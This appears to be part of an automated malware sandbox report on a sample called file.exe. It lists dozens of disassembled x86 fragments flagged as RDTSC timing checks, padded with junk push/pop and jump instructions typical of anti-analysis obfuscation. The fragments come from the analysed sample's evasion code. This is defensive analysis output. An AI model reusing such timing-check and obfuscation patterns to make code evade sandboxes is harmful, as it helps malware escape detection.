                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52B2E second address: A52B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0B44EA8C83h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52B51 second address: A52B56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A361D9 second address: A361ED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F0B44EA8C7Eh 0x0000000c push esi 0x0000000d pop esi 0x0000000e jg 00007F0B44EA8C76h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A361ED second address: A3621D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0B44BD79B8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A701C9 second address: A701CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A701CD second address: A701DA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0B44BD79A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A701DA second address: A701E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70349 second address: A7034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A704E0 second address: A704E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A704E4 second address: A704EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70670 second address: A7067A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0B44EA8C76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7067A second address: A706A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F0B44BD79AEh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A706A4 second address: A706CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B44EA8C7Bh 0x00000009 jmp 00007F0B44EA8C88h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70859 second address: A7087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0B44BD79A6h 0x0000000a popad 0x0000000b ja 00007F0B44BD79AEh 0x00000011 jc 00007F0B44BD79A8h 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70B70 second address: A70BA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007F0B44EA8C76h 0x00000010 jg 00007F0B44EA8C76h 0x00000016 jmp 00007F0B44EA8C7Ah 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 jno 00007F0B44EA8C76h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70BA0 second address: A70BAA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0B44BD79A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70BAA second address: A70BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70BB6 second address: A70BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70D2D second address: A70D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C7Bh 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70E80 second address: A70E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0B44BD79B3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70E99 second address: A70EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F0B44EA8C81h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jg 00007F0B44EA8C76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A678E3 second address: A678ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A678ED second address: A678FD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0B44EA8C76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A678FD second address: A67901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67901 second address: A6791B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F0B44EA8C7Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6791B second address: A67926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67926 second address: A6792A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6792A second address: A6792E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6792E second address: A6796E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0B44EA8C78h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F0B44EA8C83h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0B44EA8C89h 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34756 second address: A3475C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71551 second address: A7155B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A742D3 second address: A742E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0B44BD79AAh 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A742E8 second address: A742F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77A4C second address: A77A50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77A50 second address: A77A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77A56 second address: A77A5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77A5B second address: A77A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0B44EA8C76h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0B44EA8C85h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77A81 second address: A77A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77BC4 second address: A77BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B44EA8C87h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77BDF second address: A77BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D9D2 second address: A7D9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D9D8 second address: A7D9E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F0B44BD79A6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D9E8 second address: A7DA01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7DA01 second address: A7DA1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 ja 00007F0B44BD79BAh 0x0000000c jmp 00007F0B44BD79AEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7DA1D second address: A7DA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0B44EA8C87h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7DBDA second address: A7DBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 ja 00007F0B44BD79A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7DBE7 second address: A7DC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007F0B44EA8C76h 0x0000000c popad 0x0000000d jmp 00007F0B44EA8C7Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7DD61 second address: A7DD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E00D second address: A7E016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E016 second address: A7E01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E01A second address: A7E027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E027 second address: A7E02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E173 second address: A7E17D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E17D second address: A7E181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E181 second address: A7E187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81F38 second address: A81F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81F3D second address: A81F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81F43 second address: A81F5B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0B44BD79A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jng 00007F0B44BD79B0h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82651 second address: A8265F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82BAB second address: A82BAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82BAF second address: A82C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F0B44EA8C80h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jc 00007F0B44EA8C76h 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c popad 0x0000001d nop 0x0000001e jp 00007F0B44EA8C7Ch 0x00000024 xchg eax, ebx 0x00000025 jmp 00007F0B44EA8C82h 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f pop eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82C01 second address: A82C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8301C second address: A83020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83020 second address: A83025 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8399A second address: A8399E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8399E second address: A839A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A839A4 second address: A839D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0B44EA8C82h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A839D7 second address: A839DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A839DB second address: A839E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84AA6 second address: A84AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85576 second address: A855EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F0B44EA8C7Ch 0x0000000c jo 00007F0B44EA8C76h 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F0B44EA8C78h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov esi, dword ptr [ebp+124560E0h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F0B44EA8C78h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov esi, dword ptr [ebp+122D39EDh] 0x00000058 push 00000000h 0x0000005a sbb di, 49D3h 0x0000005f push eax 0x00000060 pushad 0x00000061 jl 00007F0B44EA8C7Ch 0x00000067 push eax 0x00000068 push edx 0x00000069 push ecx 0x0000006a pop ecx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A852D6 second address: A852EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007F0B44BD79A6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A852EA second address: A852F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F0B44EA8C76h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86B05 second address: A86B88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c jmp 00007F0B44BD79B9h 0x00000011 pop edi 0x00000012 nop 0x00000013 jmp 00007F0B44BD79AFh 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F0B44BD79A8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D1EFDh], ebx 0x0000003a push 00000000h 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F0B44BD79AAh 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A875FD second address: A87608 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F0B44EA8C76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A868D0 second address: A868DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0B44BD79ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A87608 second address: A8766A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F0B44EA8C7Eh 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D3689h], edi 0x00000014 push 00000000h 0x00000016 mov edi, 24698803h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F0B44EA8C78h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 sub esi, dword ptr [ebp+122D2880h] 0x0000003d mov dword ptr [ebp+122D2817h], edx 0x00000043 xchg eax, ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 jng 00007F0B44EA8C76h 0x0000004d push edi 0x0000004e pop edi 0x0000004f popad 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A66A second address: A8A681 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0B44BD79ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A887BE second address: A887DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F0B44EA8C78h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A681 second address: A8A6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F0B44BD79A8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D271Fh], edi 0x00000015 push 00000000h 0x00000017 mov ebx, dword ptr [ebp+12474C9Fh] 0x0000001d push 00000000h 0x0000001f movsx edi, ax 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A6A9 second address: A8A6B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0B44EA8C76h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B5EF second address: A8B645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 sub dword ptr [ebp+12456239h], esi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F0B44BD79A8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push ebx 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e jmp 00007F0B44BD79ACh 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0B44BD79B3h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D775 second address: A8D7F2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F0B44EA8C78h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D209Eh], ebx 0x0000002a push 00000000h 0x0000002c jns 00007F0B44EA8C84h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F0B44EA8C78h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e mov ebx, dword ptr [ebp+122D2089h] 0x00000054 xchg eax, esi 0x00000055 push eax 0x00000056 push eax 0x00000057 jno 00007F0B44EA8C76h 0x0000005d pop eax 0x0000005e pop eax 0x0000005f push eax 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 push ecx 0x00000064 pop ecx 0x00000065 rdtsc
